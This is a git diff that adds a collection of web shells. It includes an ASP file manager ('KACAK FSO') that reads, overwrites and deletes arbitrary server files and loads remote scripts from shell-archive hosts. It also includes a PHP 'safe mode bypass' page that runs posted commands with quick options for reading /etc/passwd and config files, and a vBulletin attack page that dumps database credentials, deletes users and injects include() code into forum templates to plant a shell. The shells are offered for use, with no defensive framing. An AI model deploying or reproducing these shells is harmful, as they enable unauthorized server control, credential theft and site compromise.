+          <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber24">
+            <tr>
+          <td width="62" height="17" align="center" bgcolor="#E0E0E0"
+          onmouseover="this.style.background='#A0A0A0'"
+          onmouseout="this.style.background='#E0E0E0'"
+          style="CURSOR: hand"
+          
+          >
+          <a href="?klas=<%=dongu.driveletter%>:\" style="text-decoration: none">
+          <font face="Verdana" style="font-size: 8pt" color="#000000">Gir</font></a></td>
+            </tr>
+          </table>
+          </td>
+        </tr>
+      </table>
+
+	<%
+	end if
+	end if
+	%>
+<%
+next
+%>
+
+
+
+      </center>
+    </div>
+    <div align="center">
+      <center>
+      <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber4" height="4">
+        <tr>
+          <td width="484" height="4" align="center" bgcolor="#C5C5C5">
+          <span style="font-size: 2pt">&nbsp;</span></td>
+        </tr>
+      </table>
+      </center>
+    </div>
+    <p>&nbsp;</p>
+    </td>
+  </tr>
+  <tr>
+    <td width="100%" height="19" bgcolor="#000000">&nbsp;</td>
+  </tr>
+</table>
+
+
+
+
+
+<%
+else
+%>
+
+
+
+
+
+<%
+if request.querystring("kaydet") <> "" then
+set dossisx=server.createobject("scripting.filesystemobject")
+set dosx=dossisx.opentextfile(request.querystring("kaydet"), 2, true)
+dosx.write request("duzenx")
+dosx.close
+set dosyax=nothing
+set dossisx=nothing
+
+end if
+%>
+
+
+
+
+<%
+if request.querystring("duzenle") <> "" then
+set dossis=server.createobject("scripting.filesystemobject")
+set dos=dossis.opentextfile(request.querystring("duzenle"), 1)
+sedx = dos.readall
+dos.close
+set dosya=nothing
+set dossis=nothing
+
+set aktifklas=request.querystring("klas")
+%>
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.grayhatz.org/forum/dragontwo/logo.jpg"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    TC & GH & TC TEAM©<br>
+    </span>Terrorist Crew - GrayHatz Hacking Team - TurkGuvenligi Priv8 Team<br>
+    <span style="font-weight: 700">
+    <br>
+    KACAK FSO 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.grayhatz.org ~ http://www.turkguvenligi.info" style="text-decoration: none">
+    <font color="#858585">www.GrayHatz ~ TurkGuvenligi.İnfo</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:BuqX@hotmail.com" style="text-decoration: none">
+    <font color="#858585">BuqX</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:BuqX@hootmail.com" style="text-decoration: none"><font color="#858585">@Hotmail.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan Dosya</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=response.write(request.querystring("duzenle"))%></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    <form method="POST" action="?kaydet=<%=request.querystring("duzenle")%>&klas=<%=aktifklas%>" name="kaypos">
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="163" wrap="OFF"><%=sedx%></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+&nbsp;</font></b></p>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber19">
+  <tr>
+    <td width="100%" align="right">
+    <p align="center">
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span><a href=""><input type="reset" size="16"
+		name="x" value="Vazgeç"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></a></td>
+  </tr>
+</table>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#EAEAEA">
+    <p align="right">
+	&nbsp;</td>
+  </tr>
+</table>
+
+
+
+<%
+else
+%>
+
+
+<%
+
+if request.querystring("klas") <> "" then
+aktifklas=Request.querystring("klas")
+if request.querystring("usak") = "1" then
+aktifklas=aktifklas & "\"
+end if
+
+else
+aktifklas=server.mappath("/")
+aktifklas=aktifklas & "\"
+end if
+
+if request.querystring("silklas") <> "" then
+set sis=createobject("scripting.filesystemobject")
+silincekklas=request.querystring("silklas")
+sis.deletefolder(silincekklas)
+set sis=nothing
+'response.write(sil & "  Silindi")
+end if
+
+if request.querystring("sildos") <> "" then
+silincekdos=request.querystring("sildos")
+set dosx=createobject("scripting.filesystemobject")
+set dos=dosx.getfile(silincekdos)
+dos.delete
+set dos=nothing
+set dosyasis=nothing
+end if
+
+
+
+
+select case aktifklas
+case "C:" aktifklas="C:\"
+case "D:" aktifklas="D:\"
+case "E:" aktifklas="E:\"
+case "F:" aktifklas="F:\"
+case "G:" aktifklas="G:\"
+case "H:" aktifklas="H:\"
+case "I:" aktifklas="I:\"
+case "J:" aktifklas="J:\"
+case "K:" aktifklas="K:\"
+end select
+
+
+
+if aktifklas=("C:") then aktifklas=("C:\")
+
+Set FS = CreateObject("Scripting.FileSystemObject")
+Set klasor = FS.GetFolder(aktifklas)
+Set altklasorler = klasor.SubFolders
+Set dosyalar = klasor.files
+%>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.grayhatz.org/forum/dragontwo/logo.jpg"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    TC & GH & TC TEAM ©<br><br>
+    </span>Terrorist Crew - GrayHatz Hacking Team - TurkGuvenligi Priv8 Team<br>
+    <span style="font-weight: 700">
+    <br>
+    KACAK FSO 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.grayhatz.org ~ http://www.turkguvenligi.info" style="text-decoration: none">
+    <font color="#858585">www.GrayHatz ~ TurkGuvenligi.İnfo</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:BuqX@hotmail.com" style="text-decoration: none">
+    <font color="#858585">BuqX</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:BuqX@hootmail.com" style="text-decoration: none"><font color="#858585">@Hotmail.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan Klasör</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=response.write(aktifklas)%></font></td>
+            <td width="65">
+            <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
+              <tr>
+                <td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13">
+                <p align="center"><font face="Verdana" style="font-size: 8pt">
+
+                <a href="?usklas=1&klas=<%=server.urlencode(left(aktifklas,(instrRev(aktifklas,"\"))-1))%>" style="text-decoration: none">
+                <font color="#000000">Üst Klasör</font></a></font></td>
+                
+              </tr>
+            </table>
+            </td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
+  <tr>
+    <td width="625" bgcolor="#000000"><span style="font-size: 2pt">&nbsp;</span></td>
+  </tr>
+  <tr>
+    <td bgcolor="#000000" height="20">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
+      <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        
+        height="19" bordercolor="#000000">
+        <span style="font-weight: 700">
+        <font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+        <a href="?suruculer=1" style="text-decoration: none">
+        <font color="#9F9F9F">Sürücüler</font></a></font></span></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="?klasac=1&aktifklas=<%=aktifklas%>" style="text-decoration: none">
+        <font color="#9F9F9F">Yeni Klasör</font></a></font></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19"
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+		bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="?yenidosya=<%=aktifklas%>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+  </table>
+
+
+			
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
+  <tr>
+<SCRIPT SRC=http://www.localshell.net/yazciz/ciz.js></SCRIPT>
+    <td width="30" height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Tür</font></td>
+    <td height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Dosya 
+    Adı</font></td>
+    <td width="122" height="17" bgcolor="#9F9F9F">
+    <p align="center">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;İşlem</font></td>
+  </tr>
+</table>
+
+
+
+<% For each oge in altklasorler %> 
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#808080">
+    <p align="center">
+    <img border="0" src="http://turkguvenligi.info/blues/statusicon/forum_new.gif"></td>
+    <td height="17" bgcolor="#C4C4C4">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<%=oge.name%>&nbsp;</font></td>
+    <td width="61" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="?klas=<%=aktifklas%><%=oge.name%>\" style="text-decoration: none">
+        <font color="#000000">Aç</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+
+
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="?silklas=<%=aktifklas & oge.name & "&klas=" & aktifklas %>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a>
+
+        </font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+<% Next %>
+			    
+
+<% For each oge in dosyalar %> 
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
+  <tr>
+    <SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
+    <td width="30" height="1" bgcolor="#B0B0B0">
+    <p align="center">
+    <img border="0" src="http://turkguvenligi.info/blues/statusicon/forum_new.gif"></td>
+    <td height="1" bgcolor="#EAEAEA">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<%=oge.name%> </font>
+    <font face="Arial Narrow" style="font-size: 8pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;   ( <%=Round(oge.size/1024,1)%> KB )&nbsp;</font></td>
+    <td width="61" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6" no wrap
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a style="text-decoration: none" target="_self" href="?duzenle=<%=aktifklas%><%=oge.name%>&klas=<%=aktifklas%>">
+        <font color="#000000">Düzenle</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="20">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6" no wrap
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="?sildos=<%=aktifklas%><%=oge.name%>&klas=<%=aktifklas%>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+<% Next %>
+
+
+
+<%
+if aktifklas=("C:\") then aktifklas=("C:")
+%>
+
+
+<%
+end if
+%>
+
+
+
+<%
+end if
+%>
+
+
+<%
+end if
+%>
+
+
+<%
+end if
+%>
+
+<%
+end if
+%>
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
+  <tr>
+<SCRIPT SRC=http://www.r57.biz/yazciz/ciz.js></SCRIPT>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+</table>
+
+</body>
diff --git a/php/links.php b/php/links.php
new file mode 100644
index 0000000..d35d8ef
--- /dev/null
+++ b/php/links.php
@@ -0,0 +1,78 @@
+<style type="text/css">
+<!--
+body,td,th {
+	font-family: Tahoma;
+	font-size: 12px;
+	color: #636161;
+}
+body {
+	margin-top: 100px;
+	margin-left: 200px;
+	margin-right: 200px;
+	background-color: #0D0C0C;
+}
+a {
+	font-size: 12px;
+}
+a:link {
+	text-decoration: none;
+	color: #666666;
+}
+a:visited {
+	text-decoration: none;
+	color: #666666;
+}
+a:hover {
+	text-decoration: none;
+}
+a:active {
+	text-decoration: none;
+}
+h1,h2,h3,h4,h5,h6 {
+	font-style: italic;
+}
+-->
+</style><title>r57.txt - c99.txt - r57 shell - c99 shell - r57shell - c99shell - r57 -
+c99 - shell archive - php shells - php exploits - bypass shell - safe mode
+bypass - sosyete safe mode bypass shell - Evil Shells - exploit - root -
+r57.in</title>
+<meta name="title" content="r57.txt - c99.txt - r57 shell - c99 shell - r57shell - c99shell - r57 - c99 - shell archive - php shells - php exploits - bypass shell - safe mode bypass - sosyete safe mode bypass shell - Evil Shells - exploit - root - r57.in" />
+<meta name="description" content="r57.txt - c99.txt - r57 shell - c99 shell - r57shell - c99shell - r57 -
+c99 - shell archive - php shells - php exploits - bypass shell - safe mode
+bypass - sosyete safe mode bypass shell - Evil Shells - exploit - root -
+r57.in" />
+<meta name="keywords" content="r57.txt - c99.txt - r57 shell - c99 shell - r57shell - c99shell - r57 - c99 - shell archive - php shells - php exploits - bypass shell - safe mode bypass - sosyete safe mode bypass shell - Evil Shells - exploit - root - r57.in" />
+<meta name="author" content="r57.in" />
+<meta name="owner" content="Herkes" />
+<meta name="copyright" content="(c) 2009" />
+
+<div align="center">
+  <pre>
+
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="80%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+    <p align="center">
+<img src="http://localshell.net/banner.jpg" alt="ShellCodes and Exploits City" width="587" height="71"></table>
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+    <p align="center"><a href="index.php">[  Home  ]</a>    |    <a href="shell.php">[  Shell  ]</a>   |    <a href="video.php">[  Video  ]</a>   |  <a href="links.php">[  Links  ]</a>  
+
+</table>
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+    <p align="center">
+<a href="http://tr0yan0.blogspot.com">[ Sosyete</a>   |   <a href="http://t0fan.blogspot.com">T0fan</a> 
+<a href="http://kernel.sh">[ Kernel@Sh</a>   |   <a href="http://milw0rm.com">Milw0rm</a>
+<a href="http://www.googlebig.com/">Google Big</a>   <a href="http://www.darkc0de.com/">Darkc0de</a> ] <a href="http://www.remote-exploit.org">BackTrack ]</a>
+
+
+
+
+www.r57.in
+</table>
+
+Send all submissions to  Mail <a href="mailto:thesabotaqe@gmail.com">r57</a> or r57.in 
+
+ Copyright © 2oo8~2oo9 <a href="http://localshell.net">Localshell</a>
+
+Sitemiz en iyi Firefox ile (1024 x 768 veya Üstü çözünürlükte) görünmektedir. 
+</table>
+</pre>
+</div>
diff --git a/php/liz0zim.php b/php/liz0zim.php
new file mode 100644
index 0000000..dcc8d31
--- /dev/null
+++ b/php/liz0zim.php
@@ -0,0 +1,34 @@
+<?
+echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit</font></b><br>";
+print_r('
+<pre>
+<form method="POST" action="">
+<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="Çalıştır" type="submit">
+</form>
+<form method="POST" action="">
+<b><font color=blue>Hızlı Menü :=) :</font><select size="1" name="liz0">
+<option value="cat /etc/passwd">/etc/passwd</option>
+<option value="netstat -an | grep -i listen">Tüm Açık Portaları Gör</option>
+<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
+<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
+<option value="cat /etc/hosts">/etc/hosts</option>
+<option value="cat /etc/named.conf">/etc/named.conf</option>
+<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
+</select> <input type="submit" value="Göster Bakim">
+</form>
+</pre>
+');
+ini_restore("safe_mode");
+ini_restore("open_basedir");
+$liz0=shell_exec($_POST[baba]); 
+$liz0zim=shell_exec($_POST[liz0]); 
+$uid=shell_exec('id');
+$server=shell_exec('uname -a');
+echo "<pre><h4>";
+echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>";
+echo "<b><font color=red>Server</font></b>:$server<br>";
+echo "<b><font color=red>Komut Sonuçları:</font></b><br>"; 
+echo $liz0;
+echo $liz0zim;
+echo "</h4></pre>";
+?>
\ No newline at end of file
diff --git a/php/login.php b/php/login.php
new file mode 100644
index 0000000..3585c62
--- /dev/null
+++ b/php/login.php
@@ -0,0 +1,583 @@
+
+<html><head><title>EgY SpIdEr </title>
+<STYLE>
+
+BODY
+ {
+        SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #666666; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456
+}
+
+tr {
+BORDER-RIGHT:  #dadada ;
+BORDER-TOP:    #dadada ;
+BORDER-LEFT:   #dadada ;
+BORDER-BOTTOM: #dadada ;
+color: #ffffff;
+}
+td {
+BORDER-RIGHT:  #dadada ;
+BORDER-TOP:    #dadada ;
+BORDER-LEFT:   #dadada ;
+BORDER-BOTTOM: #dadada ;
+color: #dadada;
+}
+.table1 {
+BORDER: 1;
+BACKGROUND-COLOR: #000000;
+color: #333333;
+}
+.td1 {
+BORDER: 1;
+font: 7pt tahoma;
+color: #ffffff;
+}
+.tr1 {
+BORDER: 1;
+color: #dadada;
+}
+table {
+BORDER:  #eeeeee  outset;
+BACKGROUND-COLOR: #000000;
+color: #dadada;
+}
+input {
+BORDER-RIGHT:  #00FF00 1 solid;
+BORDER-TOP:    #00FF00 1 solid;
+BORDER-LEFT:  #00FF00 1 solid;
+BORDER-BOTTOM: #00FF00 1 solid;
+BACKGROUND-COLOR: #333333;
+font: 9pt tahoma;
+color: #ffffff;
+}
+select {
+BORDER-RIGHT:  #ffffff 1 solid;
+BORDER-TOP:    #999999 1 solid;
+BORDER-LEFT:   #999999 1 solid;
+BORDER-BOTTOM: #ffffff 1 solid;
+BACKGROUND-COLOR: #000000;
+font: 9pt tahoma;
+color: #dadada;;
+}
+submit {
+BORDER:  buttonhighlight 1 outset;
+BACKGROUND-COLOR: #272727;
+width: 40%;
+color: #dadada;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1 solid;
+BORDER-TOP:    #999999 1 solid;
+BORDER-LEFT:   #999999 1 solid;
+BORDER-BOTTOM: #ffffff 1 solid;
+BACKGROUND-COLOR: #333333;
+font: Fixedsys bold;
+color: #ffffff;
+}
+BODY {
+margin: 1;
+color: #dadada;
+background-color: #000000;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+
+</STYLE>
+</head>
+ <body bgcolor="#000000" text="lime" link="lime" vlink="lime">
+ <center>
+<?
+$act = $_GET['act'];
+if($act=='reconfig' && isset($_POST['path']))
+{
+$path = $_POST['path'];
+include $path;
+?>
+<table border="1" bgcolor="#000000" bordercolor="lime"
+bordercolordark="lime" bordercolorlight="lime"><th>::::Read Config Data::::</th><th><? echo '<font color=yellow>' . $path . '</font>'; ?></th>
+<tr>
+<th>Host : </th><th><? echo '<font color=yellow>' . $config['MasterServer']['servername'] . '</font>'; ?></th>
+</tr>
+<tr>
+<th>User : </th><th><? echo '<font color=yellow>' . $config['MasterServer']['username'] . '</font>'; ?></th>
+</tr>
+<tr>
+<th>Pass : </th><th><?
+$passsql = $config['MasterServer']['password'];
+if ($passsql == '')
+{
+$result = '<font color=red>No Password</font>';
+} else {
+$result = '<font color=yellow>' . $passsql . '</font>';
+}
+echo $result; ?></th>
+</tr>
+<tr>
+<th>Name : </th><th><? echo '<font color=yellow>' . $config['Database']['dbname'] . '</font>'; ?></th>
+</tr>
+</table>
+<?
+}
+if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="del"  && isset($_POST['vbuser']) )
+{
+ $host = $_POST['host'];
+$user = $_POST['user'];
+$pass = $_POST['pass'];
+$db = $_POST['db'];
+$vbuser = $_POST['vbuser'];
+mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>');
+mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>');
+if ($pass == '')
+{
+$npass = 'NULL';
+} else {
+$npass = $pass;
+}
+echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font color=yellow>' . $db . '</font></font>';
+?>
+<hr color="#00FF00" />
+<?
+$query = 'delete * from user where username="' . $vbuser . '";';
+$r = mysql_query($query);
+if ($r)
+{
+echo '<font color=yellow>User : ' . $vbuser . ' was deleted</font>';
+} else {
+echo '<font color=red>User : ' . $vbuser . ' could not be deleted</font>';
+}
+}
+if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="shell"  && isset($_POST['var']))
+{
+$host = $_POST['host'];
+$user = $_POST['user'];
+$pass = $_POST['pass'];
+$db = $_POST['db'];
+$var = $_POST['var'];
+mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>');
+mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>');
+if ($pass == '')
+{
+$npass = 'NULL';
+} else {
+$npass = $pass;
+}
+echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font color=yellow>' . $db . '</font></font>';
+?>
+<hr color="#00FF00" />
+<?
+$Wdt = 'UPDATE `template` SET `template` = \' ".print include($HTTP_GET_VARS[' . $var . '])." \'WHERE `title` =\'FORUMHOME\';';
+$Wdt2= 'UPDATE `style` SET `css` = \' ".print include($HTTP_GET_VARS[' . $var . '])." \', `stylevars` = \'\', `csscolors` = \'\', `editorstyles` = \'\' ;';
+$result=mysql_query($Wdt);
+  if ($result) {echo "<p>Done Exploit.</p><br>Use this : <br> index.php?" . $var . "=shell.txt";}else{
+echo "<p>Error</p>";}
+$result1=mysql_query($Wdt2);
+  if ($result1) { echo "<p>Done Create File</p><br>Use this : <br> index.php?" . $var . "=shell.txt";} else{ echo "<p>Error</p>";}
+}
+if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="code"  && isset($_POST['code']))
+{
+$host = $_POST['host'];
+$user = $_POST['user'];
+$pass = $_POST['pass'];
+$db = $_POST['db'];
+$index = $_POST['code'];
